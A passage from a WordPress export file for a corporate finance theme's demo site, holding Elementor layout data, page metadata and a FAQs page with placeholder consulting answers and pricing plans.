0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"cd3eacf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"42d9c0e","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2922134","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7bdb59","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"d35150b","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"9c23cfd","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"0f844d1","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-value.jpg","id":549},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"105","left":"0","isLinked":false},"content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fc8acf7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"f8ca7a4","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"82ac6eb","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]},"content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"21dc41a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e7a0c01","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home4.png","id":2026},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aebe74e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-value.jpg","id":558},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c4c8174","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7309f3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"afeb8de","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"18aa73e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"fd1dd49","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"cb7d5c6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6734af5","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"31d8a18","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"284c1cf","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"38f0ecc","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]}},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"3f45b25","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8a829f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0a0ed67","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae65e25","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":400,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:14:{s:8:"iheading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:4;s:5:"title";i:4;s:11:"header_size";i:4;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:28:"stitle_typography_typography";i:4;s:27:"stitle_typography_font_size";i:4;s:14:"subtitle_style";i:2;s:12:"stitle_color";i:4;s:29:"stitle_typography_font_weight";i:4;s:11:"title_color";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:31;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:31;s:19:"_inline_size_tablet";i:17;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:8;s:13:"margin_mobile";i:2;s:6:"margin";i:4;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:1;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:15;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:7;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:5:{s:7:"padding";i:11;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:8;s:11:"_element_id";i:3;s:11:"css_classes";i:3;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_color";i:1;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_overlay_section";a:1:{s:10:"overlay_bg";i:3;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:4;s:10:"image_size";i:4;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:10:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:28:"title_typography_line_height";i:6;s:17:"description_color";i:6;s:33:"description_typography_typography";i:6;s:34:"description_typography_font_family";i:6;s:34:"description_typography_font_weight";i:6;s:26:"title_typography_font_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:1:{s:4:"text";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:5:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}s:13:"style_content";a:4:{s:10:"bg_content";i:1;s:13:"content_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>FAQs</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=566</guid>
		<description></description>
		<content:encoded><![CDATA[faqs	        <h3>Most Popular Questions</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you do fixed price or time and materials contracts? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you offer volume or loyalty discounts? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				What problems does business consulting typically solve? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How is the scope of a consulting project determined? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How long does a business consulting project last? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>566</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faqs]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[567]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1fad6c2","elType":"section","settings":{"padding":{"unit":"px","top":"117","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cfef8fb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b29ca39","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3d04547","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ba86566","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"4865c99","elType":"widget","settings":{"sub":"faqs","title":"Most Popular Questions","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"f714140","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"af5bfe2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e107ea","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"531351e","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2e8ff7b","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b0dc727"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b4483e5"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"f24ea6d"},{"acc_title":"Do you do fixed price or time and materials contracts?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"ceccd71"}],"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true},{"id":"a627a5f","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"8463953","elType":"widget","settings":{"ot_accs":[{"acc_title":"Do you offer volume or loyalty discounts?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"b0dc727"},{"acc_title":"What problems does business consulting typically solve?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"5b50501"},{"acc_title":"How is the scope of a consulting project determined?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"2928abe"},{"acc_title":"How long does a business consulting project last?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"f4ae810"}],"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"84019eb","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"6f925c9","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"70c78a1","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"a41d7e6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our 